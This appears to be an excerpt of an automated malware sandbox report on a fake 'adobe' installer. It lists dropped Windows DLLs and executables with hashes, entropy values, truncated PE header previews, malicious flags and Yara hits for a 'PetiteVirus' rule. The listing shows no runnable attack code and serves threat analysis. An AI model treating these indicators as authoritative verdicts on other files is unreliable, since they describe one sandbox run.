Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):227328
Entropy (8bit):6.641153481093122
Encrypted:false
SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
MD5:BC824DC1D1417DE0A0E47A30A51428FD
SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):258560
Entropy (8bit):6.491223412910377
Encrypted:false
SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
MD5:DB191B89F4D015B1B9AEE99AC78A7E65
SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):115712
Entropy (8bit):6.401537154757194
Encrypted:false
SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
MD5:840D631DA54C308B23590AD6366EBA77
SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):43520
Entropy (8bit):6.232860260916194
Encrypted:false
SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
MD5:B162992412E08888456AE13BA8BD3D90
SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):112640
                                                                                                                                                        Entropy (8bit):6.540227486061059
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                                                                                        MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                                                                                        SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                                                                                        SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                                                                                        SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                                                                                        Malicious:true
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):13838
                                                                                                                                                        Entropy (8bit):5.173769974589746
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                                                                                        MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                                                                                        SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                                                                                        SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                                                                                        SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                                                                                        Malicious:true
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):123406
                                                                                                                                                        Entropy (8bit):6.263889638223575
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                                                                                        MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                                                                                        SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                                                                                        SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                                                                                        SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                                                                                        Malicious:true
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):34392
                                                                                                                                                        Entropy (8bit):7.81689943223162
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                                                                                                        MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                                                                                                        SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                                                                                                        SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                                                                                                        SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):15374
                                                                                                                                                        Entropy (8bit):5.192037544202194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                                                                                        MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                                                                                        SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                                                                                        SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                                                                                        SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):68876
                                                                                                                                                        Entropy (8bit):7.922125376804506
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                                                                                        MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                                                                                        SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                                                                                        SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                                                                                        SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Yara Hits:
                                                                                                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmp, Author: Joe Security
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):18966
                                                                                                                                                        Entropy (8bit):7.620111275837424
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                                                                                                        MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                                                                                                        SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                                                                                                        SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                                                                                                        SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                                                                                                        Malicious:true
                                                                                                                                                        Yara Hits:
                                                                                                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmp, Author: Joe Security
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5960
                                                                                                                                                        Entropy (8bit):5.956401374574174
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                                                                                                        MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                                                                                                        SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                                                                                                        SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                                                                                                        SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):294926
                                                                                                                                                        Entropy (8bit):6.191604766067493
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                                                                                        MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                                                                                        SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                                                                                        SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                                                                                        SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                                                                                        Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:ASCII text
Category:dropped
Size (bytes):26526
Entropy (8bit):4.600837395607617
Encrypted:false
SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
MD5:BD7A443320AF8C812E4C18D1B79DF004
SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
Malicious:false
Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):126478
Entropy (8bit):6.268811819718352
Encrypted:false
SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
MD5:6E93C9C8AADA15890073E74ED8D400C9
SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):394752
Entropy (8bit):6.662070316214798
Encrypted:false
SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
MD5:A4123DE65270C91849FFEB8515A864C4
SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):240654
Entropy (8bit):6.518503846592995
Encrypted:false
SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
MD5:4F0C85351AEC4B00300451424DB4B5A4
SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):31936
Entropy (8bit):6.6461204214578
Encrypted:false
SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):197646
Entropy (8bit):6.1570532273946625
Encrypted:false
SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
MD5:2C8EC61630F8AA6AAC674E4C63F4C973
SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):337408
Entropy (8bit):6.515131904432587
Encrypted:false
SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
MD5:62D2156E3CA8387964F7AA13DD1CCD5B
SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):197120
Entropy (8bit):6.423554884287906
Encrypted:false
SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
MD5:67247C0ACA089BDE943F802BFBA8752C
SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17472
Entropy (8bit):7.524548435291935
Encrypted:false
SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
MD5:7B52BE6D702AA590DB57A0E135F81C45
SHA1:518FB84C77E547DD73C335D2090A35537111F837
SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):214016
Entropy (8bit):6.676457645865373
Encrypted:false
SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
Malicious:false
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26126
                                                                                                                                                        Entropy (8bit):6.048294343792499
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                                                                                        MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                                                                                        SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                                                                                        SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                                                                                        SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):68042
                                                                                                                                                        Entropy (8bit):6.090396152400884
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                                                                                        MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                                                                                        SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                                                                                        SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                                                                                        SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22542
                                                                                                                                                        Entropy (8bit):5.5875455203930615
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                                                                                        MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                                                                                        SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                                                                                        SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                                                                                        SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):19008
                                                                                                                                                        Entropy (8bit):7.672481244971812
                                                                                                                                                        Encrypted:false
